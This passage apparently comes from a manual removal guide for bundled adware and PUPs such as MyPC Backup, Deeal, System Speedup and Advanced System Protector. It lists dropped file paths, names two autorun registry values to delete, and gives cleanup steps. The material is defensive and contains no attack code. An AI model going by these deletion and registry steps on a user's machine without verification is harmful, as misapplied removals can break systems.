%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\DotNetChecker.dll (1552 bytes)
%Program Files%\MyPC Backup\tick.ico (12088 bytes)
%Program Files%\MyPC Backup\Signup Wizard.exe (33877 bytes)
%Program Files%\MyPC Backup\de_DE.mo (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj44.tmp (592073 bytes)
%Program Files%\MyPC Backup\AlphaVSS.60.x64.dll (6360 bytes)
%Program Files%\MyPC Backup\Updater.exe (31856 bytes)
%Program Files%\MyPC Backup\uninst.exe (1546 bytes)
%Program Files%\MyPC Backup\MyPC Backup.exe (99102 bytes)
%Program Files%\MyPC Backup\syncing.ico (12088 bytes)
%Program Files%\MyPC Backup\MPCBIconOverlays.dll (124204 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\MyPC Backup.lnk (748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\MyPC Backup\MyPC Backup.lnk (774 bytes)
%Program Files%\MyPC Backup\Database\mpcb_queues.db (13 bytes)
%Program Files%\MyPC Backup\LogicNP.EZShellExtensions.dll (8560 bytes)
%Program Files%\MyPC Backup\RegisterExtensionDotNet20_x64.exe (16 bytes)
%Program Files%\MyPC Backup\it_IT.mo (1856 bytes)
%Program Files%\MyPC Backup\pt_PT.mo (1856 bytes)
%Program Files%\MyPC Backup\MPCBClient.dll (39329 bytes)
%Program Files%\MyPC Backup\ObjectListView.dll (13584 bytes)
%Program Files%\MyPC Backup\fr_FR.mo (1856 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\MyPC Backup.lnk (762 bytes)
%Program Files%\MyPC Backup\Configuration Updater.exe (784 bytes)
%Program Files%\MyPC Backup\x64\System.Data.SQLite.dll (33633 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\MyPC Backup\Uninstall.lnk (545 bytes)
%Program Files%\Deeal\ScriptHost.dll (12721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\ie9install.bmp (2712 bytes)
%Program Files%\Deeal\jquery-1.9.1.min.js (2410 bytes)
%Program Files%\Deeal\updater.js (3 bytes)
%Program Files%\Deeal\AddonsFramework.dll (2049 bytes)
%Program Files%\Deeal\ButtonSite.dll (8982 bytes)
%Program Files%\Deeal\BackgroundHostPS.dll (707 bytes)
%Program Files%\Deeal\jquery-1.7.1.min.js (2480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\UAC.dll (13 bytes)
%Program Files%\Deeal\json2.min.js (3 bytes)
%Program Files%\Deeal\BackgroundHost.exe (15353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\help_page.ini (1539 bytes)
%Program Files%\Deeal\tool.js (856 bytes)
%Program Files%\Deeal\updaterWrapper.js (2 bytes)
%Program Files%\Deeal\config.xml (286 bytes)
%Program Files%\Deeal\background.html (932 bytes)
%Program Files%\Deeal\uninstall.exe (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CNDS9.tmp\ssupsetup_sbinstall3_sbinstall3.tmp (7386 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\Advanced-System-Protector\Settings.db (7245 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (134 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\Advanced-System-Protector\Settings.db-journal (26516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4E.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4D.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Program Files%\MyPC Backup\log\WAIT_HANDLES.log (540 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\782D7E2BFB036A849A99FFA65C652D39 (244 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4A.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\782D7E2BFB036A849A99FFA65C652D39 (535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4C.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db-journal (31542 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0E506CEBBC8B162CFB2D72DB4891DCAE (1 bytes)
%Documents and Settings%\%current user%\Desktop\Sync Folder.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4B.tmp (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0E506CEBBC8B162CFB2D72DB4891DCAE (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab49.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut40.tmp (5585 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~tewtitg.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3F.tmp (5393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scratch.bat (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\WIN-statsAdmin.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~qufjkpj.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\WIN-statsSystem.exe (3073 bytes)
%Program Files%\System Speedup\is-0H5C2.tmp (601 bytes)
%Program Files%\System Speedup\is-M23MK.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\System Speedup.lnk (761 bytes)
%Program Files%\System Speedup\is-SLC12.tmp (601 bytes)
%Program Files%\System Speedup\is-LD96U.tmp (3 bytes)
%Program Files%\System Speedup\is-PHI2Q.tmp (9605 bytes)
%Program Files%\System Speedup\is-K02N8.tmp (601 bytes)
%Program Files%\System Speedup\is-V0V6Q.tmp (61 bytes)
%Program Files%\System Speedup\is-NDBCG.tmp (3 bytes)
%Program Files%\System Speedup\is-JV4SN.tmp (601 bytes)
%Program Files%\System Speedup\is-0N5UM.tmp (601 bytes)
%Program Files%\System Speedup\is-TSUIR.tmp (601 bytes)
%Program Files%\System Speedup\is-4MQ25.tmp (2 bytes)
%Program Files%\System Speedup\is-IR05P.tmp (3 bytes)
%Documents and Settings%\All Users\Desktop\System Speedup.lnk (749 bytes)
%Program Files%\System Speedup\is-BPG1H.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\Register System Speedup.lnk (787 bytes)
%Program Files%\System Speedup\is-DRG9E.tmp (32429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_iscrypt.dll (2 bytes)
%Program Files%\System Speedup\unins000.msg (646 bytes)
%Program Files%\System Speedup\is-HO2II.tmp (601 bytes)
%Program Files%\System Speedup\is-VDBU7.tmp (673 bytes)
%Program Files%\System Speedup\is-T8KC2.tmp (3 bytes)
%Program Files%\System Speedup\is-501BS.tmp (601 bytes)
%Program Files%\System Speedup\is-MHLCB.tmp (601 bytes)
%Program Files%\System Speedup\is-NS6TN.tmp (601 bytes)
%Program Files%\System Speedup\is-T9SJP.tmp (601 bytes)
%Program Files%\System Speedup\is-IR0AU.tmp (2 bytes)
%Program Files%\System Speedup\is-RHE48.tmp (2 bytes)
%Program Files%\System Speedup\is-7MPU9.tmp (601 bytes)
%System%\roboot.exe (18 bytes)
%Program Files%\System Speedup\is-T5KNE.tmp (2 bytes)
%Program Files%\System Speedup\is-D56GU.tmp (673 bytes)
%Program Files%\System Speedup\is-L1VQG.tmp (3 bytes)
%Program Files%\System Speedup\is-KFTK7.tmp (48 bytes)
%Program Files%\System Speedup\is-GTE66.tmp (601 bytes)
%Program Files%\System Speedup\is-3KG25.tmp (3 bytes)
%Program Files%\System Speedup\is-PR38L.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\roboot.exe (18 bytes)
%Program Files%\System Speedup\is-FTDCJ.tmp (3 bytes)
%Program Files%\System Speedup\is-09HHR.tmp (2 bytes)
%Program Files%\System Speedup\is-N8TOS.tmp (601 bytes)
%Program Files%\System Speedup\is-IFID8.tmp (2 bytes)
%Program Files%\System Speedup\is-U1OSN.tmp (2 bytes)
%Program Files%\System Speedup\is-2GT1D.tmp (2 bytes)
%Program Files%\System Speedup\is-JKLDL.tmp (48 bytes)
%Program Files%\System Speedup\is-KP554.tmp (2 bytes)
%Program Files%\System Speedup\unins000.dat (17017 bytes)
%Program Files%\System Speedup\is-IN432.tmp (601 bytes)
%Program Files%\System Speedup\is-LTMNP.tmp (4185 bytes)
%Program Files%\System Speedup\is-89JAL.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\setup_en.bmp (3073 bytes)
%Program Files%\System Speedup\is-4UHHQ.tmp (3 bytes)
%Program Files%\System Speedup\is-5AJGM.tmp (2 bytes)
%Program Files%\System Speedup\is-ICS2N.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\Uninstall System Speedup.lnk (736 bytes)
%Program Files%\System Speedup\is-6MF3B.tmp (58396 bytes)
%Program Files%\System Speedup\is-Q8GAJ.tmp (34 bytes)
%Program Files%\System Speedup\is-CG9E5.tmp (3361 bytes)
%Program Files%\System Speedup\is-J4BHD.tmp (601 bytes)
%Program Files%\ASP\is-UA9SK.tmp (2 bytes)
%Program Files%\ASP\is-BJHMB.tmp (2 bytes)
%Program Files%\ASP\is-6N8DK.tmp (49054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\sasnative32.exe (17 bytes)
%Program Files%\ASP\is-JSF5L.tmp (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\ASP\Troubleshooter\is-61J5L.tmp (1168 bytes)
%Program Files%\ASP\is-NG89P.tmp (2 bytes)
%Program Files%\ASP\is-RMKAH.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\isxdl.dll (673 bytes)
%Program Files%\ASP\is-CD24S.tmp (601 bytes)
%Program Files%\ASP\is-A22MS.tmp (2 bytes)
%Program Files%\ASP\Troubleshooter\is-D45A2.tmp (673 bytes)
%Program Files%\ASP\Troubleshooter\is-267G5.tmp (1168 bytes)
%Program Files%\ASP\Troubleshooter\is-MT9JH.tmp (35 bytes)
%Documents and Settings%\All Users\Desktop\Advanced System Protector.lnk (716 bytes)
%Program Files%\ASP\is-5AQQK.tmp (6841 bytes)
%Program Files%\ASP\is-5NG2P.tmp (1281 bytes)
%Program Files%\ASP\clamunpack\is-CNFR2.tmp (3361 bytes)
%Program Files%\ASP\is-I338K.tmp (49 bytes)
%Program Files%\ASP\is-1NP20.tmp (601 bytes)
%Program Files%\ASP\is-Q4HHA.tmp (11518 bytes)
%Program Files%\ASP\Troubleshooter\is-7HA9P.tmp (1168 bytes)
%Program Files%\ASP\clamunpack\is-P9O6O.tmp (535 bytes)
%Program Files%\ASP\is-RI07C.tmp (3 bytes)
%Program Files%\ASP\is-LIPEF.tmp (601 bytes)
%Program Files%\ASP\is-7PL0F.tmp (673 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\ssd\is-5MQH6.tmp (4185 bytes)
%Program Files%\ASP\is-U199G.tmp (3 bytes)
%Program Files%\ASP\is-JN7RH.tmp (4545 bytes)
%Program Files%\ASP\unins000.msg (302 bytes)
%Program Files%\ASP\is-ROED6.tmp (2 bytes)
%Program Files%\ASP\is-10429.tmp (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_iscrypt.dll (2 bytes)
%Program Files%\ASP\is-SMSNF.tmp (601 bytes)
%Program Files%\ASP\is-LU070.tmp (601 bytes)
%Documents and Settings%\All Users\Application Data\Systweak\ASP\is-VD0F9.tmp (24 bytes)
%Program Files%\ASP\is-5U10G.tmp (42 bytes)
%Program Files%\ASP\is-05Q7E.tmp (2105 bytes)
%Program Files%\ASP\is-9FUDH.tmp (601 bytes)
%Program Files%\ASP\is-6Q7OJ.tmp (64 bytes)
%Program Files%\ASP\is-UCTCU.tmp (3 bytes)
%Program Files%\ASP\is-4244J.tmp (3 bytes)
%System%\sasnative32.exe (17 bytes)
%Program Files%\ASP\is-7HG45.tmp (601 bytes)
%Program Files%\ASP\is-KHIO8.tmp (3073 bytes)
%Program Files%\ASP\is-H6M9V.tmp (601 bytes)
%Program Files%\ASP\is-VM1O4.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Register Advanced System Protector.lnk (754 bytes)
%Program Files%\ASP\is-F0R0S.tmp (2 bytes)
%Program Files%\ASP\is-G38PR.tmp (2 bytes)
%Program Files%\ASP\is-0Q9I8.tmp (65 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Advanced System Protector Trouble Shooter.lnk (854 bytes)
%Program Files%\ASP\is-9EH5C.tmp (32233 bytes)
%Program Files%\ASP\is-OGJ58.tmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Systweak\ASP\is-52RSK.tmp (13 bytes)
%Program Files%\ASP\is-CUUIB.tmp (20536 bytes)
%Program Files%\ASP\Troubleshooter\iexplore.lnk (717 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Uninstall Advanced System Protector.lnk (653 bytes)
%Program Files%\ASP\is-QM3EH.tmp (3 bytes)
%Program Files%\ASP\is-F6NPP.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Advanced System Protector.lnk (728 bytes)
%Program Files%\ASP\is-SF545.tmp (2 bytes)
%Program Files%\ASP\is-VAO47.tmp (601 bytes)
%Program Files%\ASP\is-2K659.tmp (2 bytes)
%Program Files%\ASP\Troubleshooter\is-0HN3G.tmp (1168 bytes)
%Program Files%\ASP\is-PJF0P.tmp (601 bytes)
%Program Files%\ASP\is-C33I5.tmp (2 bytes)
%Program Files%\ASP\unins000.dat (28681 bytes)
%Program Files%\ASP\is-983A0.tmp (5 bytes)
%Program Files%\ASP\is-0RM7F.tmp (2 bytes)
%Program Files%\ASP\is-QCQ5I.tmp (2 bytes)
%Program Files%\ASP\is-M4CM8.tmp (51 bytes)
%Program Files%\ASP\clamunpack\is-3TNOV.tmp (15 bytes)
%Program Files%\ASP\is-E7U3G.tmp (601 bytes)
%Program Files%\ASP\is-JJL0N.tmp (27632 bytes)
%Program Files%\ASP\is-GM5PP.tmp (3 bytes)
%Program Files%\ASP\is-IHC3A.tmp (65 bytes)
%Program Files%\ASP\Troubleshooter\is-80F1G.tmp (1168 bytes)
%Program Files%\ASP\is-7FHI0.tmp (601 bytes)
%Program Files%\ASP\is-I7EIF.tmp (3361 bytes)
%Program Files%\ASP\is-191Q5.tmp (53 bytes)
%Program Files%\ASP\is-SQ7C1.tmp (673 bytes)
%Program Files%\ASP\is-HAFFC.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DONBT.tmp\rightbackupsetup.tmp (7386 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (3391 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\btdal_4.exe (212781 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_lastExecuted (10 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (2219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUoffer[1].params (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\conf[1].txt (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\conf[1].txt (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\SL1BK[1].htm (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\mypcbackupSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\data.ini (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\myapp_update_1.exe (22548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mypcbackup[1].exe (84617 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\new_conf.ini (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thxbetadeeal_install[1].htm (185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\mypcbackupSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\app[1].exe (211105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\win-app_update_3.exe (55924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getCaping[2].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_winUparams.ini (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\current_conf.ini (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_new_conf.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\conf[1].txt (283 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\base_conf.ini (108 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SystweakASP" = "%Program Files%\RegClean Pro\SystweakASP.exe /verysilent"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SSUPRDReminder" = "%Program Files%\System Speedup\SystemSpeedup.exe -rem" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.